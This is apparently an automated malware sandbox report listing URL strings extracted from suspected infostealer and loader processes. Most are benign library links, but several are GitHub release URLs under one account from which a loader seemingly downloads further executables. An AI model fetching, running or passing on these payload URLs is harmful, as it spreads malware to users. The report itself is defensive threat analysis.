                                  Source: client_jackbastadguy.exe, 00000017.00000003.2779956537.000002103E12C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803689007.000002103E0F8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784009746.000002103E0F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780836385.000002103E138000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778563839.000002103E128000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777372598.000002103E120000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                                  Source: legs.exe, 0000000A.00000003.2473841849.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                                  Source: legs.exe, 0000000A.00000003.2487012377.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2473876275.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2485712460.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2496864884.0000000003C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=169633223841
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802456538.000002103DC60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2818817789.00007FFE0E16B000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: legs.exe, 0000000A.00000003.2473841849.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                                  Source: legs.exe, 0000000A.00000003.2473841849.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CD50000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CD50000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CD50000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/I
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2803689007.000002103E0F8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784009746.000002103E0F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.2980326735.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/gold/releases/download/ggggg/gold1111111111.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/gold/releases/download/ggggg/gold1111111111.exe3
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/gold/releases/download/ggggg/gold1111111111.exew
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/zakaz2/releases/download/zakaz2/liddad.exeA
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/zakaz2/releases/download/zakaz2/liddad.exeT
                                  Source: axplong.exe, 00000005.00000003.2494538049.0000000005ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/zakaz2/releases/download/zakaz2/liddad.exeg
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.2980326735.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/zakaz5/releases/download/zakaz5/client_jackbastadguy.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/zakaz5/releases/download/zakaz5/client_jackbastadguy.exe08
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary6911331/zakaz5/releases/download/zakaz5/client_jackbastadguy.exe08540
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806118937.000002103EA0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802456538.000002103DC60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2801243888.000002103D760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml.exe
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel/issues
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785730846.000002103DFB3000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780195788.000002103DFB2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFB3000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802583057.000002103DD60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2766392868.000002103D936000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784431954.000002103D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
